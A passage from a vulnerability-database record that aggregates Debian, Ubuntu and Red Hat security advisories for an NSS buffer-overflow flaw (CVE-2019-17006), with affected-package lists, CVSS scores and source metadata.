        "url": "https://access.redhat.com/security/cve/cve-2021-33197"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3518"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3517"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3421"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-31525"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-20271"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3703"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3541"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-186409"
      },
      {
        "db": "PACKETSTORM",
        "id": "169015"
      },
      {
        "db": "PACKETSTORM",
        "id": "163193"
      },
      {
        "db": "PACKETSTORM",
        "id": "163197"
      },
      {
        "db": "PACKETSTORM",
        "id": "163267"
      },
      {
        "db": "PACKETSTORM",
        "id": "163276"
      },
      {
        "db": "PACKETSTORM",
        "id": "162877"
      },
      {
        "db": "PACKETSTORM",
        "id": "160436"
      },
      {
        "db": "PACKETSTORM",
        "id": "164192"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8284"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-186409",
        "ident": null
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-8284",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "169015",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163193",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163197",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163267",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "163276",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "162877",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "160436",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "164192",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2020-8284",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2020-12-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-186409",
        "ident": null
      },
      {
        "date": "2020-12-14T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-8284",
        "ident": null
      },
      {
        "date": "2021-03-28T19:12:00",
        "db": "PACKETSTORM",
        "id": "169015",
        "ident": null
      },
      {
        "date": "2021-06-17T18:01:23",
        "db": "PACKETSTORM",
        "id": "163193",
        "ident": null
      },
      {
        "date": "2021-06-17T18:09:26",
        "db": "PACKETSTORM",
        "id": "163197",
        "ident": null
      },
      {
        "date": "2021-06-23T16:08:25",
        "db": "PACKETSTORM",
        "id": "163267",
        "ident": null
      },
      {
        "date": "2021-06-24T17:54:53",
        "db": "PACKETSTORM",
        "id": "163276",
        "ident": null
      },
      {
        "date": "2021-06-01T14:45:29",
        "db": "PACKETSTORM",
        "id": "162877",
        "ident": null
      },
      {
        "date": "2020-12-10T16:02:10",
        "db": "PACKETSTORM",
        "id": "160436",
        "ident": null
      },
      {
        "date": "2021-09-17T16:04:56",
        "db": "PACKETSTORM",
        "id": "164192",
        "ident": null
      },
      {
        "date": "2020-12-14T20:15:13.903000",
        "db": "NVD",
        "id": "CVE-2020-8284",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2022-05-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-186409",
        "ident": null
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-8284",
        "ident": null
      },
      {
        "date": "2024-11-21T05:38:39.193000",
        "db": "NVD",
        "id": "CVE-2020-8284",
        "ident": null
      }
    ]
  },
  "title": {
    "_id": null,
    "data": "Debian Security Advisory 4881-1",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "169015"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "_id": null,
    "data": "code execution",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "163276"
      }
    ],
    "trust": 0.1
  }
}

VAR-202010-0251

Vulnerability from variot - Updated: 2026-03-09 21:20

In Network Security Services (NSS) before 3.46, several cryptographic primitives had missing length checks. In cases where the application calling the library did not perform a sanity check on the inputs it could result in a crash due to a buffer overflow.

For the stable distribution (buster), these problems have been fixed in version 2:3.42.1-1+deb10u3.

For the detailed security status of nss please refer to its security tracker page at: https://security-tracker.debian.org/tracker/nss

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl8R6BYACgkQEMKTtsN8 Tjbolg/9H3VC4r4Wmc8A4OejmH67QEZqyhzCxvd4UCpvLTJuY9JOYGy3KVhClnsz XDTqyQ8k5ez7OQt5HLy3giLJpMKUSYuSDJSbK0A3DTO5bKVg17Uol5X6RA7Coz/2 yJRRWH03dTfRoqaWQ8xHigBChTxMdYhkvh6433DzLpbuj+FV77FcivjTxZB2zFrp tHuvzN9exI4+aZCFAZPyRFct0vYHpHCP8qzgD+FMflInzBAARFPjnx8+c50+Hlp2 cB/Iq3L5EiE5T1azAAD8fgKqEGnF9OHjWxBONhXqXwhvnKKqfrLIpMf+oBvr8OEZ rKZElK0wQb6z24vDiDxFR8C8EuigYpV3YDsWwu3V8M71igw8DJseHQ/UnC4dT/Y3 QTtNtcWcheM5qiOnkiHCCZsybglI6NbdxPwfnhv9ltnunipFPtE8A56QQuOXGIcc 4P/5tRlRwAVSy+JZVCbJu7jrBe/y02RYXb6Sv5hZ0iqUAZadiFlJC0WdvWAOLJsL Z/IrRkH7KMwchOAxp5NY6qHfxXHKjFvfahglFkDsaYoEwVROKjhG5idn3NVCc656 tP5rcl1dQY4LHQZEESgps86uJGy9+8NpHHU9v9fqFZNlkBfYBWTZv0otzssOwPfu QIq7f2J77JHM8ldYzmfDVQnWBnKpnjc/B8UmvaaAkEM73N3MPu0= =VQPA -----END PGP SIGNATURE----- . ========================================================================= Ubuntu Security Notice USN-4231-1 January 08, 2020

nss vulnerability

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 19.10
Ubuntu 19.04
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM
Ubuntu 12.04 ESM

Summary:

NSS could be made to execute arbitrary code if it received a specially crafted input. An attacker could possibly use this issue to execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 19.10: libnss3 2:3.45-1ubuntu2.2

Ubuntu 19.04: libnss3 2:3.42-1ubuntu2.5

Ubuntu 18.04 LTS: libnss3 2:3.35-2ubuntu2.7

Ubuntu 16.04 LTS: libnss3 2:3.28.4-0ubuntu0.16.04.10

Ubuntu 14.04 ESM: libnss3 2:3.28.4-0ubuntu0.14.04.5+esm4

Ubuntu 12.04 ESM: libnss3 2:3.28.4-0ubuntu0.12.04.7

After a standard system update you need to reboot your computer to make all the necessary changes. 7.4) - x86_64

7.7) - ppc64, ppc64le, s390x, x86_64
Summary:

Red Hat Ansible Automation Platform Resource Operator 1.2 (technical preview) images that fix several security issues. Description:

Red Hat Ansible Automation Platform Resource Operator container images with security fixes.

Ansible Automation Platform manages Ansible Platform jobs and workflows that can interface with any infrastructure on a Red Hat OpenShift Container Platform cluster, or on a traditional infrastructure that is running off-cluster. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):

1914774 - CVE-2021-20178 ansible: user data leak in snmp_facts module 1915808 - CVE-2021-20180 ansible module: bitbucket_pipeline_variable exposes secured values 1916813 - CVE-2021-20191 ansible: multiple modules expose secured values 1925002 - CVE-2021-20228 ansible: basic.py no_log with fallback option 1939349 - CVE-2021-3447 ansible: multiple modules expose secured values

Description:
Updated python-psutil version to 5.6.6 inside ansible-runner container (CVE-2019-18874)
Solution:

For information on upgrading Ansible Tower, reference the Ansible Tower Upgrade and Migration Guide: https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/ index.html

Bugs fixed (https://bugzilla.redhat.com/):

1772014 - CVE-2019-18874 python-psutil: double free because of refcount mishandling

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Moderate: nss and nss-softokn security update Advisory ID: RHSA-2021:0876-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:0876 Issue date: 2021-03-16 CVE Names: CVE-2019-11756 CVE-2019-17006 CVE-2019-17007 CVE-2020-12403 ==================================================================== 1. Summary:

An update for nss and nss-softokn is now available for Red Hat Enterprise Linux 7.6 Extended Update Support.

Relevant releases/architectures:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.6) - x86_64 Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.6) - x86_64 Red Hat Enterprise Linux Server EUS (v. 7.6) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 7.6) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - aarch64, ppc64le, s390x Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - aarch64, ppc64le, s390x

Description:

Network Security Services (NSS) is a set of libraries designed to support the cross-platform development of security-enabled client and server applications.

Security Fix(es):

nss: Use-after-free in sftk_FreeSession due to improper refcounting (CVE-2019-11756)
nss: Check length of inputs for cryptographic primitives (CVE-2019-17006)
nss: Handling of Netscape Certificate Sequences in CERT_DecodeCertPackage() may crash with a NULL deref leading to DoS (CVE-2019-17007)
nss: CHACHA20-POLY1305 decryption with undersized tag leads to out-of-bounds read (CVE-2020-12403)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, applications using NSS (for example, Firefox) must be restarted for this update to take effect.

Bugs fixed (https://bugzilla.redhat.com/):

1703979 - CVE-2019-17007 nss: Handling of Netscape Certificate Sequences in CERT_DecodeCertPackage() may crash with a NULL deref leading to DoS 1774835 - CVE-2019-11756 nss: Use-after-free in sftk_FreeSession due to improper refcounting 1775916 - CVE-2019-17006 nss: Check length of inputs for cryptographic primitives 1868931 - CVE-2020-12403 nss: CHACHA20-POLY1305 decryption with undersized tag leads to out-of-bounds read

Package List:

Red Hat Enterprise Linux ComputeNode EUS (v. 7.6):

Source: nss-3.36.0-9.el7_6.src.rpm nss-softokn-3.36.0-7.el7_6.src.rpm

x86_64: nss-3.36.0-9.el7_6.i686.rpm nss-3.36.0-9.el7_6.x86_64.rpm nss-debuginfo-3.36.0-9.el7_6.i686.rpm nss-debuginfo-3.36.0-9.el7_6.x86_64.rpm nss-softokn-3.36.0-7.el7_6.i686.rpm nss-softokn-3.36.0-7.el7_6.x86_64.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.i686.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.x86_64.rpm nss-softokn-freebl-3.36.0-7.el7_6.i686.rpm nss-softokn-freebl-3.36.0-7.el7_6.x86_64.rpm nss-sysinit-3.36.0-9.el7_6.x86_64.rpm nss-tools-3.36.0-9.el7_6.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.6):

x86_64: nss-debuginfo-3.36.0-9.el7_6.i686.rpm nss-debuginfo-3.36.0-9.el7_6.x86_64.rpm nss-devel-3.36.0-9.el7_6.i686.rpm nss-devel-3.36.0-9.el7_6.x86_64.rpm nss-pkcs11-devel-3.36.0-9.el7_6.i686.rpm nss-pkcs11-devel-3.36.0-9.el7_6.x86_64.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.i686.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.x86_64.rpm nss-softokn-devel-3.36.0-7.el7_6.i686.rpm nss-softokn-devel-3.36.0-7.el7_6.x86_64.rpm nss-softokn-freebl-devel-3.36.0-7.el7_6.i686.rpm nss-softokn-freebl-devel-3.36.0-7.el7_6.x86_64.rpm

Red Hat Enterprise Linux Server EUS (v. 7.6):

Source: nss-3.36.0-9.el7_6.src.rpm nss-softokn-3.36.0-7.el7_6.src.rpm

ppc64: nss-3.36.0-9.el7_6.ppc.rpm nss-3.36.0-9.el7_6.ppc64.rpm nss-debuginfo-3.36.0-9.el7_6.ppc.rpm nss-debuginfo-3.36.0-9.el7_6.ppc64.rpm nss-devel-3.36.0-9.el7_6.ppc.rpm nss-devel-3.36.0-9.el7_6.ppc64.rpm nss-softokn-3.36.0-7.el7_6.ppc.rpm nss-softokn-3.36.0-7.el7_6.ppc64.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.ppc.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.ppc64.rpm nss-softokn-devel-3.36.0-7.el7_6.ppc.rpm nss-softokn-devel-3.36.0-7.el7_6.ppc64.rpm nss-softokn-freebl-3.36.0-7.el7_6.ppc.rpm nss-softokn-freebl-3.36.0-7.el7_6.ppc64.rpm nss-softokn-freebl-devel-3.36.0-7.el7_6.ppc.rpm nss-softokn-freebl-devel-3.36.0-7.el7_6.ppc64.rpm nss-sysinit-3.36.0-9.el7_6.ppc64.rpm nss-tools-3.36.0-9.el7_6.ppc64.rpm

ppc64le: nss-3.36.0-9.el7_6.ppc64le.rpm nss-debuginfo-3.36.0-9.el7_6.ppc64le.rpm nss-devel-3.36.0-9.el7_6.ppc64le.rpm nss-softokn-3.36.0-7.el7_6.ppc64le.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.ppc64le.rpm nss-softokn-devel-3.36.0-7.el7_6.ppc64le.rpm nss-softokn-freebl-3.36.0-7.el7_6.ppc64le.rpm nss-softokn-freebl-devel-3.36.0-7.el7_6.ppc64le.rpm nss-sysinit-3.36.0-9.el7_6.ppc64le.rpm nss-tools-3.36.0-9.el7_6.ppc64le.rpm

s390x: nss-3.36.0-9.el7_6.s390.rpm nss-3.36.0-9.el7_6.s390x.rpm nss-debuginfo-3.36.0-9.el7_6.s390.rpm nss-debuginfo-3.36.0-9.el7_6.s390x.rpm nss-devel-3.36.0-9.el7_6.s390.rpm nss-devel-3.36.0-9.el7_6.s390x.rpm nss-softokn-3.36.0-7.el7_6.s390.rpm nss-softokn-3.36.0-7.el7_6.s390x.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.s390.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.s390x.rpm nss-softokn-devel-3.36.0-7.el7_6.s390.rpm nss-softokn-devel-3.36.0-7.el7_6.s390x.rpm nss-softokn-freebl-3.36.0-7.el7_6.s390.rpm nss-softokn-freebl-3.36.0-7.el7_6.s390x.rpm nss-softokn-freebl-devel-3.36.0-7.el7_6.s390.rpm nss-softokn-freebl-devel-3.36.0-7.el7_6.s390x.rpm nss-sysinit-3.36.0-9.el7_6.s390x.rpm nss-tools-3.36.0-9.el7_6.s390x.rpm

x86_64: nss-3.36.0-9.el7_6.i686.rpm nss-3.36.0-9.el7_6.x86_64.rpm nss-debuginfo-3.36.0-9.el7_6.i686.rpm nss-debuginfo-3.36.0-9.el7_6.x86_64.rpm nss-devel-3.36.0-9.el7_6.i686.rpm nss-devel-3.36.0-9.el7_6.x86_64.rpm nss-softokn-3.36.0-7.el7_6.i686.rpm nss-softokn-3.36.0-7.el7_6.x86_64.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.i686.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.x86_64.rpm nss-softokn-devel-3.36.0-7.el7_6.i686.rpm nss-softokn-devel-3.36.0-7.el7_6.x86_64.rpm nss-softokn-freebl-3.36.0-7.el7_6.i686.rpm nss-softokn-freebl-3.36.0-7.el7_6.x86_64.rpm nss-softokn-freebl-devel-3.36.0-7.el7_6.i686.rpm nss-softokn-freebl-devel-3.36.0-7.el7_6.x86_64.rpm nss-sysinit-3.36.0-9.el7_6.x86_64.rpm nss-tools-3.36.0-9.el7_6.x86_64.rpm

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):

Source: nss-3.36.0-9.el7_6.src.rpm nss-softokn-3.36.0-7.el7_6.src.rpm

aarch64: nss-3.36.0-9.el7_6.aarch64.rpm nss-debuginfo-3.36.0-9.el7_6.aarch64.rpm nss-devel-3.36.0-9.el7_6.aarch64.rpm nss-softokn-3.36.0-7.el7_6.aarch64.rpm nss-softokn-debuginfo-3.36.0-7.el7_6.aarch64.rpm nss-softokn-devel-3.36.0-7.el7_6.aarch64.rpm nss-softokn-freebl-3.36.0-7.el7_6.aarch64.rpm nss-softokn-freebl-devel-3.36.0-7.el7_6.aarch64.rpm nss-sysinit-3.36.0-9.el7_6.aarch64.rpm nss-tools-3.36.0-9.el7_6.aarch64.rpm

Red Hat Enterprise Linux Server Optional EUS (v. 7.6):

ppc64: nss-debuginfo-3.36.0-9.el7_6.ppc.rpm nss-debuginfo-3.36.0-9.el7_6.ppc64.rpm nss-pkcs11-devel-3.36.0-9.el7_6.ppc.rpm nss-pkcs11-devel-3.36.0-9.el7_6.ppc64.rpm

ppc64le: nss-debuginfo-3.36.0-9.el7_6.ppc64le.rpm nss-pkcs11-devel-3.36.0-9.el7_6.ppc64le.rpm

s390x: nss-debuginfo-3.36.0-9.el7_6.s390.rpm nss-debuginfo-3.36.0-9.el7_6.s390x.rpm nss-pkcs11-devel-3.36.0-9.el7_6.s390.rpm nss-pkcs11-devel-3.36.0-9.el7_6.s390x.rpm

x86_64: nss-debuginfo-3.36.0-9.el7_6.i686.rpm nss-debuginfo-3.36.0-9.el7_6.x86_64.rpm nss-pkcs11-devel-3.36.0-9.el7_6.i686.rpm nss-pkcs11-devel-3.36.0-9.el7_6.x86_64.rpm

Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):

aarch64: nss-debuginfo-3.36.0-9.el7_6.aarch64.rpm nss-pkcs11-devel-3.36.0-9.el7_6.aarch64.rpm

ppc64le: nss-debuginfo-3.36.0-9.el7_6.ppc64le.rpm nss-pkcs11-devel-3.36.0-9.el7_6.ppc64le.rpm

s390x: nss-debuginfo-3.36.0-9.el7_6.s390.rpm nss-debuginfo-3.36.0-9.el7_6.s390x.rpm nss-pkcs11-devel-3.36.0-9.el7_6.s390.rpm nss-pkcs11-devel-3.36.0-9.el7_6.s390x.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

References:

https://access.redhat.com/security/cve/CVE-2019-11756 https://access.redhat.com/security/cve/CVE-2019-17006 https://access.redhat.com/security/cve/CVE-2019-17007 https://access.redhat.com/security/cve/CVE-2020-12403 https://access.redhat.com/security/updates/classification/#moderate

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

iQIVAwUBYFDHndzjgjWX9erEAQhc7BAAkp67Ydt2JQVRfRhv2NUd0sjnWReLTvdP jCz5vIgKz8JIgmz/bc5I1MR8ZCSObdbsUEiv0exapuYneLNru//0dMGL2dv7Fkn5 Em5+ZuvLuDUq9id8TOOd5igNjBeJGKy4dJV46AXtgUHARHbiU5jcmOcCetkBY09J o0bK4wDc6YjvUBANaAQH/sWznAT+BNmtOeF00seAbIgic0m76HidFSQzcq8I+vtm mttqgZvz3+xYitS/63Z4AQofI3VFGX46CHZxekI7N1hIpML7QjiZw4gk8QgdpRWn wLtr661MIse/iS0l+4ZvQoWx5diuVwXudfGmisEXhsWtx79m8JSFNavmxSK9dvJ5 5F6K275OTX2W1GSUgU4IrKxWaLoBPQlC4yT36c4827qosGBjgufGyExgmqnTyQyR iobqDMUHq5RgjNsHNCzrm7CKAgwTUgyuN5QLoXwOsqxPfMt1uL8TI1Q5ULyuPJ+b 8IxbIPGgCZM/haNchD9Xoo1rDieT1JOtQNTfknss91AIQZH30n7i6F6/l8K7GJ16 1sFPnNI7aISjvhu/+jfgNpkoFi6Qyda5a8jSceWpY1yf83/jsxVpKMqgcoTf416z IFzoYxQqa0AM1efVfgtL1vnoAXw8yPt0PjXfcMUYWltIGbgO15L/hJZ6bCUu8FT6 BbaFUBBSJpw=m1vv -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . 8) - aarch64, ppc64le, s390x, x86_64

Netscape Portable Runtime (NSPR) provides platform independence for non-GUI operating system facilities.

The following packages have been upgraded to a later upstream version: nss (3.53.1), nspr (4.25.0).

Bug Fix(es):

Install of update of nss.x86_64 adds i686 into transaction (BZ#1663187)
NSS does not set downgrade sentinel in ServerHello.random for TLS 1.0 and TLS 1.1 (BZ#1691409)
TLS Keying Material Exporter is unsupported by command line tools (BZ#1691454)
TLS_AES_256_GCM_SHA384 is not marked as FIPS compatible (BZ#1711375)
Make TLS 1.3 work in FIPS mode (BZ#1724250)
NSS rejects records with large padding with SHA384 HMAC (BZ#1750921)
NSS missing IKEv1 Quick Mode KDF (BZ#1809637)
Name Constraints validation: CN treated as DNS name even when syntactically invalid as DNS name (BZ#1825270)
FIPS needs nss to restrict valid dh primes to those primes that are approved. (BZ#1854564)
nss needs to comply to the new SP800-56A rev 3 requirements (BZ#1855825)

Enhancement(s):

[RFE] nss should use AES for storage of keys (BZ#1723819)
Bugs fixed (https://bugzilla.redhat.com/):

1663187 - Install of update of nss.x86_64 adds i686 into transaction 1691454 - TLS Keying Material Exporter is unsupported by command line tools 1711375 - TLS_AES_256_GCM_SHA384 is not marked as FIPS compatible 1724250 - Make TLS 1.3 work in FIPS mode [rhel-8] 1750921 - NSS rejects records with large padding with SHA384 HMAC 1774835 - CVE-2019-11756 nss: UAF in sftk_FreeSession due to improper refcounting 1775916 - CVE-2019-17006 nss: Check length of inputs for cryptographic primitives 1791225 - CVE-2019-17023 nss: TLS 1.3 HelloRetryRequest downgrade request sets client into invalid state 1809637 - NSS missing IKEv1 Quick Mode KDF 1825270 - Name Constraints validation: CN treated as DNS name even when syntactically invalid as DNS name 1826231 - CVE-2020-12402 nss: Side channel vulnerabilities during RSA key generation 1854564 - FIPS needs nss to restrict valid dh primes to those primes that are approved. [rhel-8.2.0.z]

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "ruggedcom rox mx5000",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.14.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx5000",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.14.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1500",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.14.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1501",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.14.0"
      },
      {
        "_id": null,
        "model": "hci management node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1400",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.14.0"
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1510",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.14.0"
      },
      {
        "_id": null,
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "hci compute node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1511",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.14.0"
      },
      {
        "_id": null,
        "model": "network security services",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "mozilla",
        "version": "3.46"
      },
      {
        "_id": null,
        "model": "hci storage node",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "_id": null,
        "model": "ruggedcom rox rx1512",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2.14.0"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-17006"
      }
    ]
  },
  "credits": {
    "_id": null,
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "161706"
      },
      {
        "db": "PACKETSTORM",
        "id": "162026"
      },
      {
        "db": "PACKETSTORM",
        "id": "162142"
      },
      {
        "db": "PACKETSTORM",
        "id": "159553"
      },
      {
        "db": "PACKETSTORM",
        "id": "161842"
      },
      {
        "db": "PACKETSTORM",
        "id": "158724"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-17006",
  "cvss": {
    "_id": null,
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CVE-2019-17006",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 1.1,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-17006",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-17006",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201912-1134",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-17006",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-17006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201912-1134"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-17006"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "In Network Security Services (NSS) before 3.46, several cryptographic primitives had missing length checks. In cases where the application calling the library did not perform a sanity check on the inputs it could result in a crash due to a buffer overflow. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2:3.42.1-1+deb10u3. \n\nFor the detailed security status of nss please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/nss\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl8R6BYACgkQEMKTtsN8\nTjbolg/9H3VC4r4Wmc8A4OejmH67QEZqyhzCxvd4UCpvLTJuY9JOYGy3KVhClnsz\nXDTqyQ8k5ez7OQt5HLy3giLJpMKUSYuSDJSbK0A3DTO5bKVg17Uol5X6RA7Coz/2\nyJRRWH03dTfRoqaWQ8xHigBChTxMdYhkvh6433DzLpbuj+FV77FcivjTxZB2zFrp\ntHuvzN9exI4+aZCFAZPyRFct0vYHpHCP8qzgD+FMflInzBAARFPjnx8+c50+Hlp2\ncB/Iq3L5EiE5T1azAAD8fgKqEGnF9OHjWxBONhXqXwhvnKKqfrLIpMf+oBvr8OEZ\nrKZElK0wQb6z24vDiDxFR8C8EuigYpV3YDsWwu3V8M71igw8DJseHQ/UnC4dT/Y3\nQTtNtcWcheM5qiOnkiHCCZsybglI6NbdxPwfnhv9ltnunipFPtE8A56QQuOXGIcc\n4P/5tRlRwAVSy+JZVCbJu7jrBe/y02RYXb6Sv5hZ0iqUAZadiFlJC0WdvWAOLJsL\nZ/IrRkH7KMwchOAxp5NY6qHfxXHKjFvfahglFkDsaYoEwVROKjhG5idn3NVCc656\ntP5rcl1dQY4LHQZEESgps86uJGy9+8NpHHU9v9fqFZNlkBfYBWTZv0otzssOwPfu\nQIq7f2J77JHM8ldYzmfDVQnWBnKpnjc/B8UmvaaAkEM73N3MPu0=\n=VQPA\n-----END PGP SIGNATURE-----\n. =========================================================================\nUbuntu Security Notice USN-4231-1\nJanuary 08, 2020\n\nnss vulnerability\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 19.10\n- Ubuntu 19.04\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 ESM\n- Ubuntu 12.04 ESM\n\nSummary:\n\nNSS could be made to execute arbitrary code if it received a specially\ncrafted input. An\nattacker could possibly use this issue to execute arbitrary code. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 